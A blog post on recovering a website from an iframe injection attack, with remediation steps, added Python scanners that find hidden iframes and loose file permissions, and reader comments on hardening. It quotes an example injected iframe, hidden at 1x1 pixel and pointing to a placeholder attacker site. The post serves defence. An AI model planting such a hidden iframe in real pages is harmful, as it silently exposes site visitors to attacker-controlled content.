Troubleshooting an IFrame Injection Attack

An IFrame injection attack is considered one of the most common and most basic cross-site scripting (XSS) attacks. If your website has recently suffered an iframe injection, do not panic. Here are a few things you can do immediately after discovering that your website has been the victim of an iframe injection attack.

<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of malicious IFRAME injection code

1. Take your website down for a certain period
It is recommended to take the website down, as you do not want to distribute malware or viruses from your website to your visitors. The website should stay offline while you are recovering the site.

2. Change all the passwords
Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website, including FTP passwords, SSH passwords, account passwords, database passwords, admin passwords and so on.

3. Take a copy of the affected website for further analysis
You may want to do further analysis of the attack and might need to refer to the exact injected source code in the future. Take a copy of the affected website in a compressed format (e.g. zip or gzip) and store it in a quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.

4. Replace the entire site with a clean backup copy
Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night; however, it is more reliable to have your own backup solution for your website. Scan your backup copy with anti-virus software such as ZoneAlarm or Trend Micro before uploading it to the web server, to ensure that the backup copy is free from viruses and Trojan horses.

5. Test the website and reopen
This is to make sure that the website has been reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.

6. Analyse how the attack was originated
To ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it originated. Was it because of a security hole in your application? Was it caused by weak file permissions? Or is your server infected with malware that injects this code into your website at regular intervals? You will need to understand how it happened in order to prevent it in the future, and, when necessary, obtain expert advice.

7. Perform appropriate security measures based on the analysis
Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is very likely that the website will be attacked again in the near future. Therefore, it is recommended that you perform the necessary security measures, be it hardening your web server, upgrading an application, or introducing new security restrictions.
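As an added example (not part of the original post), here is a small Python scanner for the quarantined copy taken in step 3, or for a backup before it is restored in step 4. It flags every iframe that is hidden from the visitor the way the tag quoted above is (1x1 pixel, visibility: hidden or display: none); the sample page and its hostnames are constructed.

```python
import os
import re

# Constructed sample page modelled on the injected tag quoted in the post;
# the hosts are placeholders, not real sites.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
<IFRAME SRC='http://malicious.example/x.php' STYLE="display:none"></IFRAME>
</body></html>"""

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

def _attrs(tag):
    # Lower-cased attribute name -> value, whichever quoting style was used.
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
            for m in ATTR.finditer(tag)}

def _tiny(value):
    # Width/height of 0 or 1 pixel: the usual size of an invisible iframe.
    digits = re.match(r"\s*(\d+)", value or "")
    return digits is not None and int(digits.group(1)) <= 1

def is_hidden_iframe(tag):
    a = _attrs(tag)
    style = a.get("style", "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or (_tiny(a.get("width")) and _tiny(a.get("height"))))

def find_hidden_iframes(html):
    """Return (line_number, src) for every iframe hidden from the visitor."""
    hits = []
    for m in IFRAME_TAG.finditer(html):
        if is_hidden_iframe(m.group(0)):
            line = html.count("\n", 0, m.start()) + 1
            hits.append((line, _attrs(m.group(0)).get("src", "")))
    return hits

def scan_tree(root, exts=(".html", ".htm", ".php", ".js", ".tpl")):
    """Walk a quarantined copy or a backup and map file path -> hidden iframes."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits = find_hidden_iframes(f.read())
                if hits:
                    findings[path] = hits
    return findings
```

Run scan_tree() against the unpacked quarantine copy and then against the backup; a backup that still returns findings is the situation described in the comments below, where a restored copy carried the injection with it.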

My experience and advice

I have encountered and recovered quite a few websites that had been attacked by malicious iframe injections in recent years, and the common causes seem to be as follows:

  • The website is hosted on a cheap web hosting service
  • The website is using an old version of an open source application (eg: WordPress 1.0) which has known security issues
  • File permissions on the server are not set appropriately (eg: every file and folder on the server is set to 777 – read-write-execute for everyone)
  • Weaknesses in the application code, for example insufficient input validation
  • FTP rather than SFTP is used
  • There is no IP restriction for SSH and FTP accounts

There are a few simple things that can be done to reduce the risk of your website being attacked.

  • Change your passwords periodically (say, at least once a month)
  • Keep your applications up-to-date. Always upgrade immediately when a new version is available.
  • Clean up files and directories on the web server. Make sure there are no old files with .bak or .txt extensions lying around
  • Ensure that appropriate file permissions are used for every file and directory on the web server
  • Consult with a security expert to obtain the best advice
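A quick way to check the two file-hygiene points above, as an added example that is not from the original post: it walks a web root and flags anything world-writable, anything more permissive than a 644/755 baseline (an assumed convention, not stated in the post), and stray .bak/.txt-style files; the exemption of robots.txt is also an assumption.

```python
import os
import stat

# Rules taken from the post: no 777-style permissions, no stray .bak/.txt
# files left in the web root. The baselines (644 for files, 755 for
# directories) are the usual hosting defaults and are assumed here.
FILE_BASELINE, DIR_BASELINE = 0o644, 0o755
STALE_SUFFIXES = (".bak", ".txt", ".old", ".orig", ".swp", "~")
ALLOWED_TXT = ("robots.txt", "humans.txt")  # assumed exemptions

def audit_entry(path, mode):
    """Return the problems found for one path, given its st_mode bits."""
    problems = []
    perm = stat.S_IMODE(mode)
    is_dir = stat.S_ISDIR(mode)
    baseline = DIR_BASELINE if is_dir else FILE_BASELINE
    if perm & stat.S_IWOTH:
        problems.append(f"world-writable mode {perm:03o}")
    elif perm & ~baseline:
        problems.append(f"mode {perm:03o} exceeds baseline {baseline:03o}")
    name = os.path.basename(path).lower()
    if not is_dir and name.endswith(STALE_SUFFIXES) and name not in ALLOWED_TXT:
        problems.append("stale backup or text file in web root")
    return problems

def audit_tree(root):
    """Walk a web root and map each offending path to its list of problems."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # judge the target where it lives, not the link
            problems = audit_entry(path, st.st_mode)
            if problems:
                findings[path] = problems
    return findings
```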

11 thoughts on “Troubleshooting an IFrame Injection Attack”

  1. I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.

    Now that I’ve cleared it, attacks have stopped. So you might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

    Cheers :)

    Akash

  2. I was facing the same problem since April.
    Even now I don't know how to rectify it; I have used 20 jQuery files for usability and effects for my website.

    I am searching for, still no permanent requiry.

    If anybody wants to help me on this issue, pls…

    Thanks
    Mahes

  3. My website was attacked with this too.

    I had a backup so I restored it, but what I didn't realise was that my backup also had the iframe injection. My website was up for an hour and then it was down again. I did an AV scan with Avast on the backup files and found the iframe virus, deleted it, did a full scan on my PC, and now I can get my website back online. But even though I will change the passwords and everything, I think this can still be a dangerous one, because if a visitor of your website has the same virus, they can easily infect you with it without knowing they had the virus. It can actually be sitting on his website ready to fire if you have visited such a website or have been redirected to it somehow. One of those is the Firefox pop-ups: never accept anything that pops up unless you have set it to do so, and if you do by mistake then you get redirected to the infected website and get infected yourself, and now you are the virus who goes and visits the websites and infects all which have no strong wall and lots of ports open. One of the main and easy security measures on Firefox you should have is “KeyScrambler”: anything you type becomes encrypted text. Not good for all but most is Adblock Plus, which is an add-on for Firefox; this stops any link that you filter, so it may come in handy for blocking lots of ads and stops you being directed to visit an infected site that can infect you. These are my little suggestions to get more security on your PC and your web server, and make sure you learn all about what file permission settings are all about; that will also give you some extra security.

    All this information I gained through searches and trials, and from my silly thinking that I had enough security set up. Obviously not! My only hope is that we never give up and fight back with these issues, and help and share information with each other; then hopefully you won't be the next victim! …

  4. For .NET, just add the following to the web.config file

    This will prevent scripting attacks.

  5. Looks like this site has removed my coding :-) to prevent scripting attacks :-)

    So in the web.config file, under system.web, just set the property validateRequest of the pages tag to TRUE.

  6. I have encountered the same problem.. good thing I have restored the site. But I was wondering what might have caused this kind of injection? Is my computer infected with a virus, does the server have the virus, or something..??

  7. Grab a copy of Upload Guardian for your VPS/dedicated server. It scans FTP/PHP uploads in real-time and blocks the attacking IP in the firewall.
